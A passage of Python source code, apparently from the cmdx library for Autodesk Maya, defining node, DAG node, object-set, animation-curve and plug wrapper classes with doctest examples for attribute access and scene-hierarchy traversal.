elif mobject.hasFn(om.MFn.kSet):
sup = ObjectSet
elif mobject.hasFn(om.MFn.kAnimCurve):
sup = AnimCurve
else:
sup = Node
self = super(Singleton, sup).__call__(mobject, exists, modifier)
self._hashCode = hsh
self._hexStr = hx
cls._instances[hx] = self
return self
@add_metaclass(Singleton)
class Node(object):
"""A Maya dependency node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> decompose = createNode("decomposeMatrix", name="decompose")
>>> str(decompose)
'decompose'
>>> alias = encode(decompose.name())
>>> decompose == alias
True
>>> transform = createNode("transform")
>>> transform["tx"] = 5
>>> transform["worldMatrix"][0] >> decompose["inputMatrix"]
>>> decompose["outputTranslate"]
(5.0, 0.0, 0.0)
"""
_Fn = om.MFnDependencyNode
# Module-level cache of previously created instances of Node
_Cache = dict()
def __eq__(self, other):
"""MObject supports this operator explicitly"""
try:
# Better to ask forgivness than permission
return self._mobject == other._mobject
except AttributeError:
return str(self) == str(other)
def __ne__(self, other):
try:
return self._mobject != other._mobject
except AttributeError:
return str(self) != str(other)
def __str__(self):
return self.name(namespace=True)
def __repr__(self):
return self.name(namespace=True)
def __add__(self, other):
"""Support legacy + '.attr' behavior
Example:
>>> node = createNode("transform")
>>> getAttr(node + ".tx")
0.0
>>> delete(node)
"""
return self[other.strip(".")]
def __contains__(self, other):
"""Does the attribute `other` exist?"""
return self.hasAttr(other)
def __getitem__(self, key):
"""Get plug from self
Arguments:
key (str, tuple): String lookup of attribute,
optionally pass tuple to include unit.
Example:
>>> node = createNode("transform")
>>> node["translate"] = (1, 1, 1)
>>> node["translate", Meters]
(0.01, 0.01, 0.01)
"""
unit = None
cached = False
if isinstance(key, (list, tuple)):
key, items = key[0], key[1:]
for item in items:
if isinstance(item, _Unit):
unit = item
elif isinstance(item, _Cached):
cached = True
if cached:
try:
return CachedPlug(self._state["values"][key, unit])
except KeyError:
pass
try:
plug = self.findPlug(key)
except RuntimeError:
raise ExistError("%s.%s" % (self.path(), key))
return Plug(self, plug, unit=unit, key=key, modifier=self._modifier)
def __setitem__(self, key, value):
"""Support item assignment of new attributes or values
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="myNode")
>>> node["myAttr"] = Double(default=1.0)
>>> node["myAttr"] == 1.0
True
>>> node["rotateX", Degrees] = 1.0
>>> node["rotateX"] = Degrees(1)
>>> node["rotateX", Degrees]
1.0
>>> node["myDist"] = Distance()
>>> node["myDist"] = node["translateX"]
>>> node["myDist", Centimeters] = node["translateX", Meters]
>>> round(node["rotateX", Radians], 3)
0.017
>>> node["myDist"] = Distance()
Traceback (most recent call last):
...
ExistError: myDist
>>> node["notExist"] = 5
Traceback (most recent call last):
...
ExistError: |myNode.notExist
>>> delete(node)
"""
if isinstance(value, Plug):
value = value.read()
unit = None
if isinstance(key, (list, tuple)):
key, unit = key
# Convert value to the given unit
if isinstance(value, (list, tuple)):
value = list(unit(v) for v in value)
else:
value = unit(value)
# Create a new attribute
elif isinstance(value, (tuple, list)):
if isinstance(value[0], type):
if issubclass(value[0], _AbstractAttribute):
Attribute, kwargs = value
attr = Attribute(key, **kwargs)
try:
return self.addAttr(attr.create())
except RuntimeError:
# NOTE: I can't be sure this is the only occasion
# where this exception is thrown. Stay catious.
raise ExistError(key)
try:
plug = self.findPlug(key)
except RuntimeError:
raise ExistError("%s.%s" % (self.path(), key))
plug = Plug(self, plug, unit=unit)
if not getattr(self._modifier, "isDone", True):
# Only a few attribute types are supported by a modifier
if _python_to_mod(value, plug, self._modifier._modifier):
return
else:
log.warning(
"Could not write %s via modifier, writing directly.."
% plug
)
# Else, write it immediately
plug.write(value)
def _onDestroyed(self, mobject):
self._destroyed = True
om.MMessage.removeCallbacks(self._state["callbacks"])
for callback in self.onDestroyed:
try:
callback(self)
except Exception:
traceback.print_exc()
_data.pop(self.hex, None)
def _onRemoved(self, mobject, modifier, _=None):
self._removed = True
for callback in self.onRemoved:
try:
callback()
except Exception:
traceback.print_exc()
def __delitem__(self, key):
self.deleteAttr(key)
@withTiming()
def __init__(self, mobject, exists=True, modifier=None):
"""Initialise Node
Private members:
mobject (om.MObject): Wrap this MObject
fn (om.MFnDependencyNode): The corresponding function set
modifier (om.MDagModifier, optional): Operations are
deferred to this modifier.
destroyed (bool): Has this node been destroyed by Maya?
state (dict): Optional state for performance
"""
self._mobject = mobject
self._fn = self._Fn(mobject)
self._modifier = modifier
self._destroyed = False
self._removed = False
self._hashCode = None
self._state = {
"plugs": dict(),
"values": dict(),
"callbacks": list()
}
# Callbacks
self.onDestroyed = list()
self.onRemoved = list()
Stats.NodeInitCount += 1
self._state["callbacks"] += [
# Monitor node deletion, to prevent accidental
# use of MObject past its lifetime which may
# result in a fatal crash.
om.MNodeMessage.addNodeDestroyedCallback(
mobject,
self._onDestroyed, # func
None # clientData
) if not ROGUE_MODE else 0,
om.MNodeMessage.addNodeAboutToDeleteCallback(
mobject,
self._onRemoved,
None
),
]
def plugin(self):
"""Return the user-defined class of the plug-in behind this node"""
return type(self._fn.userNode())
def instance(self):
"""Return the current plug-in instance of this node"""
return self._fn.userNode()
def object(self):
"""Return MObject of this node"""
return self._mobject
def isAlive(self):
"""The node exists somewhere in memory"""
return not self._destroyed
@property
def data(self):
"""Special handling for data stored in the instance
Normally, the initialisation of data could happen in the __init__,
but for some reason the postConstructor of a custom plug-in calls
__init__ twice for every unique hex, which causes any data added
there to be wiped out once the postConstructor is done.
"""
return _data[self.hex]
@property
def destroyed(self):
return self._destroyed
@property
def exists(self):
"""The node exists in both memory *and* scene
Example:
>>> node = createNode("joint")
>>> node.exists
True
>>> cmds.delete(str(node))
>>> node.exists
False
>>> node.destroyed
False
>>> _ = cmds.file(new=True, force=True)
>>> node.exists
False
>>> node.destroyed
True
"""
return not self._removed
@property
def removed(self):
return self._removed
@property
def hashCode(self):
"""Return MObjectHandle.hashCode of this node
This a guaranteed-unique integer (long in Python 2)
similar to the UUID of Maya 2016
"""
return self._hashCode
@property
def hexStr(self):
"""Return unique hashCode as hexadecimal string
Example:
>>> node = createNode("transform")
>>> node.hexStr == format(node.hashCode, "x")
True
"""
return self._hexStr
# Alias
code = hashCode
hex = hexStr
@property
def typeId(self):
"""Return the native maya.api.MTypeId of this node
Example:
>>> node = createNode("transform")
>>> node.typeId == tTransform
True
"""
return self._fn.typeId
@property
def typeName(self):
return self._fn.typeName
def isA(self, type):
"""Evaluate whether self is of `type`
Arguments:
type (int): MFn function set constant
Example:
>>> node = createNode("transform")
>>> node.isA(kTransform)
True
>>> node.isA(kShape)
False
"""
return self._mobject.hasFn(type)
def lock(self, value=True):
self._fn.isLocked = value
def isLocked(self):
return self._fn.isLocked
@property
def storable(self):
"""Whether or not to save this node with the file"""
# How is this value queried?
return None
@storable.setter
def storable(self, value):
# The original function is a double negative
self._fn.setDoNotWrite(not bool(value))
# Module-level branch; evaluated on import
@withTiming("findPlug() reuse {time:.4f} ns")
def findPlug(self, name, cached=False):
"""Cache previously found plugs, for performance
Cost: 4.9 microseconds/call
Part of the time taken in querying an attribute is the
act of finding a plug given its name as a string.
This causes a 25% reduction in time taken for repeated
attribute queries. Though keep in mind that state is stored
in the `cmdx` object which currently does not survive rediscovery.
That is, if a node is created and later discovered through a call
to `encode`, then the original and discovered nodes carry one
state each.
Additional challenges include storing the same plug for both
long and short name of said attribute, which is currently not
the case.
Arguments:
name (str): Name of plug to find
cached (bool, optional): Return cached plug, or
throw an exception. Default to False, which
means it will run Maya's findPlug() and cache
the result.
safe (bool, optional): Always find the plug through
Maya's API, defaults to False. This will not perform
any caching and is intended for use during debugging
to spot whether caching is causing trouble.
Example:
>>> node = createNode("transform")
>>> node.findPlug("translateX", cached=True)
Traceback (most recent call last):
...
KeyError: "'translateX' not cached"
>>> plug1 = node.findPlug("translateX")
>>> isinstance(plug1, om.MPlug)
True
>>> plug1 is node.findPlug("translateX")
True
>>> plug1 is node.findPlug("translateX", cached=True)
True
"""
try:
existing = self._state["plugs"][name]
Stats.PlugReuseCount += 1
return existing
except KeyError:
if cached:
raise KeyError("'%s' not cached" % name)
plug = self._fn.findPlug(name, False)
self._state["plugs"][name] = plug
return plug
def update(self, attrs):
"""Apply a series of attributes all at once
This operates similar to a Python dictionary.
Arguments:
attrs (dict): Key/value pairs of name and attribute
Examples:
>>> node = createNode("transform")
>>> node.update({"tx": 5.0, ("ry", Degrees): 30.0})
>>> node["tx"]
5.0
"""
for key, value in attrs.items():
self[key] = value
def clear(self):
"""Clear transient state
A node may cache previously queried values for performance
at the expense of memory. This method erases any cached
values, freeing up memory at the expense of performance.
Example:
>>> node = createNode("transform")
>>> node["translateX"] = 5
>>> node["translateX"]
5.0
>>> # Plug was reused
>>> node["translateX"]
5.0
>>> # Value was reused
>>> node.clear()
>>> node["translateX"]
5.0
>>> # Plug and value was recomputed
"""
self._state["plugs"].clear()
self._state["values"].clear()
@protected
def name(self, namespace=False):
"""Return the name of this node
Arguments:
namespace (bool, optional): Return with namespace,
defaults to False
Example:
>>> node = createNode("transform", name="myName")
>>> node.name()
u'myName'
"""
if namespace:
return self._fn.name()
else:
return self._fn.name().rsplit(":", 1)[-1]
def namespace(self):
"""Get namespace of node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="myNode")
>>> node.namespace()
u''
>>> _ = cmds.namespace(add=":A")
>>> _ = cmds.namespace(add=":A:B")
>>> node = createNode("transform", name=":A:B:myNode")
>>> node.namespace()
u'A:B'
"""
name = self._fn.name()
if ":" in name:
# Else it will return name as-is, as namespace
# E.g. Ryan_:leftHand -> Ryan_, but :leftHand -> leftHand
return name.rsplit(":", 1)[0]
return type(name)()
# Alias
def path(self):
return self.name(namespace=True)
shortestPath = path
def pop(self, key):
"""Delete an attribute
Arguments:
key (str): Name of attribute to delete
Example:
>>> node = createNode("transform")
>>> node["myAttr"] = Double()
>>> node.pop("myAttr")
>>> node.hasAttr("myAttr")
False
"""
del self[key]
def dump(self, ignore_error=True):
"""Return dictionary of all attributes
Example:
>>> import json
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("choice")
>>> dump = node.dump()
>>> isinstance(dump, dict)
True
>>> dump["choice1.caching"]
False
"""
attrs = {}
count = self._fn.attributeCount()
for index in range(count):
obj = self._fn.attribute(index)
plug = self._fn.findPlug(obj, False)
try:
value = Plug(self, plug).read()
except (RuntimeError, TypeError):
# TODO: Support more types of attributes,
# such that this doesn't need to happen.
value = None
if not ignore_error:
raise
attrs[plug.name()] = value
return attrs
def dumps(self, indent=4, sortKeys=True):
"""Return a JSON compatible dictionary of all attributes"""
return json.dumps(self.dump(), indent=indent, sort_keys=sortKeys)
def type(self):
"""Return type name
Example:
>>> node = createNode("choice")
>>> node.type()
u'choice'
"""
return self._fn.typeName
def addAttr(self, attr):
"""Add a new dynamic attribute to node
Arguments:
attr (Plug): Add this attribute
Example:
>>> node = createNode("transform")
>>> attr = Double("myAttr", default=5.0)
>>> node.addAttr(attr)
>>> node["myAttr"] == 5.0
True
"""
if isinstance(attr, _AbstractAttribute):
attr = attr.create()
self._fn.addAttribute(attr)
def hasAttr(self, attr):
"""Return whether or not `attr` exists
Arguments:
attr (str): Name of attribute to check
Example:
>>> node = createNode("transform")
>>> node.hasAttr("mysteryAttribute")
False
>>> node.hasAttr("translateX")
True
>>> node["myAttr"] = Double() # Dynamic attribute
>>> node.hasAttr("myAttr")
True
"""
return self._fn.hasAttribute(attr)
def deleteAttr(self, attr):
"""Delete `attr` from node
Arguments:
attr (Plug): Attribute to remove
Example:
>>> node = createNode("transform")
>>> node["myAttr"] = Double()
>>> node.deleteAttr("myAttr")
>>> node.hasAttr("myAttr")
False
"""
if not isinstance(attr, Plug):
attr = self[attr]
attribute = attr._mplug.attribute()
self._fn.removeAttribute(attribute)
def connections(self, type=None, unit=None, plugs=False):
"""Yield plugs of node with a connection to any other plug
Arguments:
unit (int, optional): Return plug in this unit,
e.g. Meters or Radians
type (str, optional): Restrict output to nodes of this type,
e.g. "transform" or "mesh"
plugs (bool, optional): Return plugs, rather than nodes
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", name="A")
>>> b = createNode("multDoubleLinear", name="B")
>>> a["ihi"] << b["ihi"]
>>> list(a.connections()) == [b]
True
>>> list(b.connections()) == [a]
True
>>> a.connection() == b
True
"""
for plug in self._fn.getConnections():
mobject = plug.node()
node = Node(mobject)
if not type or type == node._fn.typeName:
plug = Plug(node, plug, unit)
for connection in plug.connections(plugs=plugs):
yield connection
def connection(self, type=None, unit=None, plug=False):
"""Singular version of :func:`connections()`"""
return next(self.connections(type, unit, plug), None)
def rename(self, name):
if not getattr(self._modifier, "isDone", True):
return self._modifier.rename(self, name)
mod = om.MDGModifier()
mod.renameNode(self._mobject, name)
mod.doIt()
if ENABLE_PEP8:
is_alive = isAlive
hex_str = hexStr
hash_code = hashCode
type_id = typeId
type_name = typeName
is_a = isA
is_locked = isLocked
find_plug = findPlug
add_attr = addAttr
has_attr = hasAttr
delete_attr = deleteAttr
shortest_path = shortestPath
class DagNode(Node):
"""A Maya DAG node
The difference between this and Node is that a DagNode
can have one or more children and one parent (multiple
parents not supported).
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.parent() == parent
True
>>> next(parent.children()) == child
True
>>> parent.child() == child
True
>>> sibling = createNode("transform", parent=parent)
>>> child.sibling() == sibling
True
>>> shape = createNode("mesh", parent=child)
>>> child.shape() == shape
True
>>> shape.parent() == child
True
"""
_Fn = om.MFnDagNode
def __str__(self):
return self.path()
def __repr__(self):
return self.path()
def __init__(self, mobject, *args, **kwargs):
super(DagNode, self).__init__(mobject, *args, **kwargs)
self._tfn = om.MFnTransform(mobject)
@protected
def path(self):
"""Return full path to node
Example:
>>> parent = createNode("transform", "myParent")
>>> child = createNode("transform", "myChild", parent=parent)
>>> child.name()
u'myChild'
>>> child.path()
u'|myParent|myChild'
"""
return self._fn.fullPathName()
@protected
def dagPath(self):
"""Return a om.MDagPath for this node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform", name="Parent")
>>> child = createNode("transform", name="Child", parent=parent)
>>> path = child.dagPath()
>>> str(path)
'Child'
>>> str(path.pop())
'Parent'
"""
return om.MDagPath.getAPathTo(self._mobject)
@protected
def shortestPath(self):
"""Return shortest unique path to node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform", name="myParent")
>>> child = createNode("transform", name="myChild", parent=parent)
>>> child.shortestPath()
u'myChild'
>>> child = createNode("transform", name="myChild")
>>> # Now `myChild` could refer to more than a single node
>>> child.shortestPath()
u'|myChild'
"""
return self._fn.partialPathName()
@property
def level(self):
"""Return the number of parents this DAG node has
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.level
1
>>> parent.level
0
"""
return self.path().count("|") - 1
@property
def boundingBox(self):
"""Return a cmdx.BoundingBox of this DAG node"""
return BoundingBox(self._fn.boundingBox)
def hide(self):
"""Set visibility to False"""
self["visibility"] = False
def show(self):
"""Set visibility to True"""
self["visibility"] = True
def addChild(self, child, index=Last):
"""Add `child` to self
Arguments:
child (Node): Child to add
index (int, optional): Physical location in hierarchy,
defaults to cmdx.Last
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform")
>>> parent.addChild(child)
"""
mobject = child._mobject
self._fn.addChild(mobject, index)
def assembly(self):
"""Return the top-level parent of node
Example:
>>> parent1 = createNode("transform")
>>> parent2 = createNode("transform")
>>> child = createNode("transform", parent=parent1)
>>> grandchild = createNode("transform", parent=child)
>>> child.assembly() == parent1
True
>>> parent2.assembly() == parent2
True
"""
path = self._fn.getPath()
root = None
for level in range(path.length() - 1):
root = path.pop()
return self.__class__(root.node()) if root else self
def transform(self, space=sObject, time=None):
"""Return TransformationMatrix"""
plug = self["worldMatrix"][0] if space == sWorld else self["matrix"]
return TransformationMatrix(plug.asMatrix(time))
def mapFrom(self, other, time=None):
"""Return TransformationMatrix of `other` relative self
Example:
>>> a = createNode("transform")
>>> b = createNode("transform")
>>> a["translate"] = (0, 5, 0)
>>> b["translate"] = (0, -5, 0)
>>> delta = a.mapFrom(b)
>>> delta.translation()[1]
10.0
>>> a = createNode("transform")
>>> b = createNode("transform")
>>> a["translate"] = (0, 5, 0)
>>> b["translate"] = (0, -15, 0)
>>> delta = a.mapFrom(b)
>>> delta.translation()[1]
20.0
"""
a = self["worldMatrix"][0].asMatrix(time)
b = other["worldInverseMatrix"][0].asMatrix(time)
delta = a * b
return TransformationMatrix(delta)
def mapTo(self, other, time=None):
"""Return TransformationMatrix of self relative `other`
See :func:`mapFrom` for examples.
"""
return other.mapFrom(self, time)
# Alias
root = assembly
def parent(self, type=None):
"""Return parent of node
Arguments:
type (str, optional): Return parent, only if it matches this type
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.parent() == parent
True
>>> not child.parent(type="camera")
True
>>> parent.parent()
"""
mobject = self._fn.parent(0)
if mobject.apiType() == om.MFn.kWorld:
return
cls = self.__class__
if not type or type == self._fn.__class__(mobject).typeName:
return cls(mobject)
def children(self,
type=None,
filter=om.MFn.kTransform,
query=None,
contains=None):
"""Return children of node
All returned children are transform nodes, as specified by the
`filter` argument. For shapes, use the :func:`shapes` method.
The `contains` argument only returns transform nodes containing
a shape of the type provided.
Arguments:
type (str, optional): Return only children that match this type
filter (int, optional): Return only children with this function set
contains (str, optional): Child must have a shape of this type
query (dict, optional): Limit output to nodes with these attributes
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", "a")
>>> b = createNode("transform", "b", parent=a)
>>> c = createNode("transform", "c", parent=a)
>>> d = createNode("mesh", "d", parent=c)
>>> list(a.children()) == [b, c]
True
>>> a.child() == b
True
>>> c.child(type="mesh")
>>> c.child(type="mesh", filter=None) == d
True
>>> c.child(type=("mesh", "transform"), filter=None) == d
True
>>> a.child() == b
True
>>> a.child(contains="mesh") == c
True
>>> a.child(contains="nurbsCurve") is None
True
>>> b["myAttr"] = Double(default=5)
>>> a.child(query=["myAttr"]) == b
True
>>> a.child(query=["noExist"]) is None
True
>>> a.child(query={"myAttr": 5}) == b
True
>>> a.child(query={"myAttr": 1}) is None
True
"""
# Shapes have no children
if self.isA(kShape):
return
cls = DagNode
Fn = self._fn.__class__
op = operator.eq
if isinstance(type, (tuple, list)):
op = operator.contains
other = "typeId" if isinstance(type, om.MTypeId) else "typeName"
for index in range(self._fn.childCount()):
try:
mobject = self._fn.child(index)
except RuntimeError:
# TODO: Unsure of exactly when this happens
log.warning(
"Child %d of %s not found, this is a bug" % (index, self)
)
raise
if filter is not None and not mobject.hasFn(filter):
continue
if not type or op(type, getattr(Fn(mobject), other)):
node = cls(mobject)
if not contains or node.shape(type=contains):
if query is None:
yield node
elif isinstance(query, dict):
try:
if all(node[key] == value
for key, value in query.items()):
yield node
except ExistError:
continue
else:
if all(key in node for key in query):
yield node
def child(self,
type=None,
filter=om.MFn.kTransform,
query=None,
contains=None):
return next(self.children(type, filter, query, contains), None)
def shapes(self, type=None, query=None):
return self.children(type, kShape, query)
def shape(self, type=None):
return next(self.shapes(type), None)
def siblings(self, type=None, filter=om.MFn.kTransform):
parent = self.parent()
if parent is not None:
for child in parent.children(type=type, filter=filter):
if child != self:
yield child
def sibling(self, type=None, filter=None):
return next(self.siblings(type, filter), None)
# Module-level expression; this isn't evaluated
# at run-time, for that extra performance boost.
if hasattr(om, "MItDag"):
def descendents(self, type=None):
"""Faster and more efficient dependency graph traversal
Requires Maya 2017+
Example:
>>> grandparent = createNode("transform")
>>> parent = createNode("transform", parent=grandparent)
>>> child = createNode("transform", parent=parent)
>>> mesh = createNode("mesh", parent=child)
>>> it = grandparent.descendents(type=tMesh)
>>> next(it) == mesh
True
>>> next(it)
Traceback (most recent call last):
...
StopIteration
"""
type = type or om.MFn.kInvalid
typeName = None
# Support filtering by typeName
if isinstance(type, string_types):
typeName = type
type = om.MFn.kInvalid
it = om.MItDag(om.MItDag.kDepthFirst, om.MFn.kInvalid)
it.reset(
self._mobject,
om.MItDag.kDepthFirst,
om.MIteratorType.kMObject
)
it.next() # Skip self
while not it.isDone():
mobj = it.currentItem()
node = DagNode(mobj)
if typeName is None:
if not type or type == node._fn.typeId:
yield node
else:
if not typeName or typeName == node._fn.typeName:
yield node
it.next()
else:
def descendents(self, type=None):
"""Recursive, depth-first search; compliant with MItDag of 2017+
Example:
>>> grandparent = createNode("transform")
>>> parent = createNode("transform", parent=grandparent)
>>> child = createNode("transform", parent=parent)
>>> mesh = createNode("mesh", parent=child)
>>> it = grandparent.descendents(type=tMesh)
>>> next(it) == mesh
True
>>> next(it)
Traceback (most recent call last):
...
StopIteration
"""
def _descendents(node, children=None):
children = children or list()
children.append(node)
for child in node.children(filter=None):
_descendents(child, children)
return children
# Support filtering by typeName
typeName = None
if isinstance(type, str):
typeName = type
type = om.MFn.kInvalid
descendents = _descendents(self)[1:] # Skip self
for child in descendents:
if typeName is None:
if not type or type == child._fn.typeId:
yield child
else:
if not typeName or typeName == child._fn.typeName:
yield child
def descendent(self, type=om.MFn.kInvalid):
"""Singular version of :func:`descendents()`
A recursive, depth-first search.
.. code-block:: python
a
|
b---d
| |
c e
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", "a")
>>> b = createNode("transform", "b", parent=a)
>>> c = createNode("transform", "c", parent=b)
>>> d = createNode("transform", "d", parent=b)
>>> e = createNode("transform", "e", parent=d)
>>> a.descendent() == a.child()
True
>>> list(a.descendents()) == [b, c, d, e]
True
>>> f = createNode("mesh", "f", parent=e)
>>> list(a.descendents(type="mesh")) == [f]
True
"""
return next(self.descendents(type), None)
def duplicate(self):
"""Return a duplicate of self"""
return self.__class__(self._fn.duplicate())
def clone(self, name=None, parent=None, worldspace=False):
"""Return a clone of self
A "clone" assignes the .outMesh attribute of a mesh node
to the `.inMesh` of the resulting clone.
Supports:
- mesh
Arguments:
name (str, optional): Name of newly created clone
parent (DagNode, optional): Parent to newly cloned node
worldspace (bool, optional): Translate output to worldspace
"""
if self.isA(kShape) and self.typeName == "mesh":
assert parent is not None, "mesh cloning requires parent argument"
name or parent.name() + "Clone"
with DagModifier() as mod:
mesh = mod.createNode("mesh", name, parent)
mesh["inMesh"] << self["outMesh"]
return mesh
else:
raise TypeError("Unsupported clone target: %s" % self)
def isLimited(self, typ):
return self._tfn.isLimited(typ)
def limitValue(self, typ):
return self._tfn.limitValue(typ)
def enableLimit(self, typ, state):
return self._tfn.enableLimit(typ, state)
def setLimit(self, typ, value):
return self._tfn.setLimit(typ, value)
if ENABLE_PEP8:
shortest_path = shortestPath
add_child = addChild
dag_path = dagPath
map_from = mapFrom
map_to = mapTo
is_limited = isLimited
limit_value = limitValue
set_limit = setLimit
enable_limit = enableLimit
bounding_box = boundingBox
# MFnTransform Limit Types
kRotateMaxX = 13
kRotateMaxY = 15
kRotateMaxZ = 17
kRotateMinX = 12
kRotateMinY = 14
kRotateMinZ = 16
kScaleMaxX = 1
kScaleMaxY = 3
kScaleMaxZ = 5
kScaleMinX = 0
kScaleMinY = 2
kScaleMinZ = 4
kShearMaxXY = 7
kShearMaxXZ = 9
kShearMaxYZ = 11
kShearMinXY = 6
kShearMinXZ = 8
kShearMinYZ = 10
kTranslateMaxX = 19
kTranslateMaxY = 21
kTranslateMaxZ = 23
kTranslateMinX = 18
kTranslateMinY = 20
kTranslateMinZ = 22
class ObjectSet(Node):
"""Support set-type operations on Maya sets
Caveats
1. MFnSet was introduced in Maya 2016, this class backports
that behaviour for Maya 2015 SP3
2. Adding a DAG node as a DG node persists its function set
such that when you query it, it'll return the name rather
than the path.
Therefore, when adding a node to an object set, it's important
that it is added either a DAG or DG node depending on what it it.
This class manages this automatically.
"""
@protected
def shortestPath(self):
return self.name(namespace=True)
def __iter__(self):
for member in self.members():
yield member
def add(self, member):
"""Add single `member` to set
Arguments:
member (cmdx.Node): Node to add
"""
return self.update([member])
def remove(self, members):
mobj = _encode1(self.name(namespace=True))
selectionList = om1.MSelectionList()
if not isinstance(members, (tuple, list)):
selectionList.add(members.path())
else:
for member in members:
selectionList.add(member.path())
fn = om1.MFnSet(mobj)
fn.removeMembers(selectionList)
def update(self, members):
"""Add several `members` to set
Arguments:
members (list): Series of cmdx.Node instances
"""
cmds.sets(list(map(str, members)), forceElement=self.path())
def clear(self):
"""Remove all members from set"""
mobj = _encode1(self.name(namespace=True))
fn = om1.MFnSet(mobj)
fn.clear()
def sort(self, key=lambda o: (o.typeName, o.path())):
"""Sort members of set by `key`
Arguments:
key (lambda): See built-in `sorted(key)` for reference
"""
members = sorted(
self.members(),
key=key
)
self.clear()
self.update(members)
def descendent(self, type=None):
"""Return the first descendent"""
return next(self.descendents(type), None)
def descendents(self, type=None):
"""Return hierarchy of objects in set"""
for member in self.members(type=type):
yield member
try:
for child in member.descendents(type=type):
yield child
except AttributeError:
continue
def flatten(self, type=None):
"""Return members, converting nested object sets into its members
Example:
>>> from maya import cmds
>>> _ = cmds.file(new=True, force=True)
>>> a = cmds.createNode("transform", name="a")
>>> b = cmds.createNode("transform", name="b")
>>> c = cmds.createNode("transform", name="c")
>>> cmds.select(a)
>>> gc = cmds.sets([a], name="grandchild")
>>> cc = cmds.sets([gc, b], name="child")
>>> parent = cmds.sets([cc, c], name="parent")
>>> mainset = encode(parent)
>>> sorted(mainset.flatten(), key=lambda n: n.name())
[|a, |b, |c]
"""
members = set()
def recurse(objset):
for member in objset:
if member.isA(om.MFn.kSet):
recurse(member)
elif type is not None:
if type == member.typeName:
members.add(member)
else:
members.add(member)
recurse(self)
return list(members)
def member(self, type=None):
"""Return the first member"""
return next(self.members(type), None)
def members(self, type=None):
op = operator.eq
other = "typeId"
if isinstance(type, string_types):
other = "typeName"
if isinstance(type, (tuple, list)):
op = operator.contains
for node in cmds.sets(self.name(namespace=True), query=True) or []:
node = encode(node)
if not type or op(type, getattr(node._fn, other)):
yield node
class AnimCurve(Node):
if __maya_version__ >= 2016:
def __init__(self, mobj, exists=True, modifier=None):
super(AnimCurve, self).__init__(mobj, exists, modifier)
self._fna = oma.MFnAnimCurve(mobj)
def key(self, time, value, interpolation=Linear):
time = om.MTime(time, om.MTime.uiUnit())
index = self._fna.find(time)
if index:
self._fna.setValue(index, value)
else:
self._fna.addKey(time, value, interpolation, interpolation)
def keys(self, times, values, interpolation=Linear):
times = map(lambda t: om.MTime(t, TimeUnit), times)
try:
self._fna.addKeys(times, values)
except RuntimeError:
# The error provided by Maya aren't very descriptive,
# help a brother out by look for common problems.
if not times:
log.error("No times were provided: %s" % str(times))
if not values:
log.error("No values were provided: %s" % str(values))
if len(values) != len(times):
log.error(
"Count mismatch; len(times)=%d, len(values)=%d" % (
len(times), len(values)
)
)
raise
class Plug(object):
def __abs__(self):
"""Return absolute value of plug
Example:
>>> node = createNode("transform")
>>> node["tx"] = -10
>>> abs(node["tx"])
10.0
"""
return abs(self.read())
def __bool__(self):
"""if plug:
Example:
>>> node = createNode("transform")
>>> node["tx"] = 10
>>> if node["tx"]:
... True
...
True
"""
return bool(self.read())
# Python 3
__nonzero__ = __bool__
def __float__(self):
"""Return plug as floating point value
Example:
>>> node = createNode("transform")
>>> float(node["visibility"])
1.0
"""
return float(self.read())
def __int__(self):
"""Return plug as int
Example:
>>> node = createNode("transform")
>>> int(node["visibility"])
1
"""
return int(self.read())
def __eq__(self, other):
"""Compare plug to `other`
Example:
>>> node = createNode("transform")
>>> node["visibility"] == True
True
>>> node["visibility"] == node["nodeState"]
False
>>> node["visibility"] != node["nodeState"]
True
"""
if isinstance(other, Plug):
other = other.read()
return self.read() == other
def __ne__(self, other):
if isinstance(other, Plug):
other = other.read()
return self.read() != other
def __neg__(self):
"""Negate unary operator
Example:
>>> node = createNode("transform")
>>> node["visibility"] = 1
>>> -node["visibility"]
-1
"""
return -self.read()
def __div__(self, other):
"""Python 2.x division
Example:
>>> node = createNode("transform")
>>> node["tx"] = 5
>>> node["ty"] = 2
>>> node["tx"] / node["ty"]
2.5
"""
if isinstance(other, Plug):
other = other.read()
return self.read() / other
def __truediv__(self, other):
"""Float division, e.g. self / other"""
if isinstance(other, Plug):
other = other.read()
return self.read() / other
def __add__(self, other):
"""Support legacy add string to plug
Note:
Adding to short name is faster, e.g. node["t"] + "x",
than adding to longName, e.g. node["translate"] + "X"
Example:
>>> node = createNode("transform")
>>> node["tx"] = 5
>>> node["translate"] + "X"
5.0
>>> node["t"] + "x"
5.0
>>> try:
... node["t"] + node["r"]
... except TypeError:
... error = True
...
>>> error
True
"""
if isinstance(other, str):
try:
# E.g. node["t"] + "x"
return self._node[self.name() + other]
except ExistError:
# E.g. node["translate"] + "X"
return self._node[self.name(long=True) + other]
raise TypeError(
"unsupported operand type(s) for +: 'Plug' and '%s'"
% type(other)
)
def __iadd__(self, other):
"""Support += operator, for .append()
Example:
>>> node = createNode("transform")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].append(1.0)
>>> node["myArray"].extend([2.0, 3.0])
>>> node["myArray"] += 5.1
>>> node["myArray"] += [1.1, 2.3, 999.0]
>>> node["myArray"][0]
1.0
>>> node["myArray"][6]
999.0
>>> node["myArray"][-1]
999.0
"""
if isinstance(other, (tuple, list)):
for entry in other:
self.append(entry)
else:
self.append(other)
return self
def __str__(self):
"""Return value as str
Example:
>>> node = createNode("transform")
>>> str(node["tx"])
'0.0'
"""
return str(self.read())
def __repr__(self):
return str(self.read())
def __rshift__(self, other):
"""Support connecting attributes via A >> B"""
self.connect(other)
def __lshift__(self, other):
"""Support connecting attributes via A << B"""
other.connect(self)
def __floordiv__(self, other):
"""Disconnect attribute via A // B
Example:
>>> nodeA = createNode("transform")
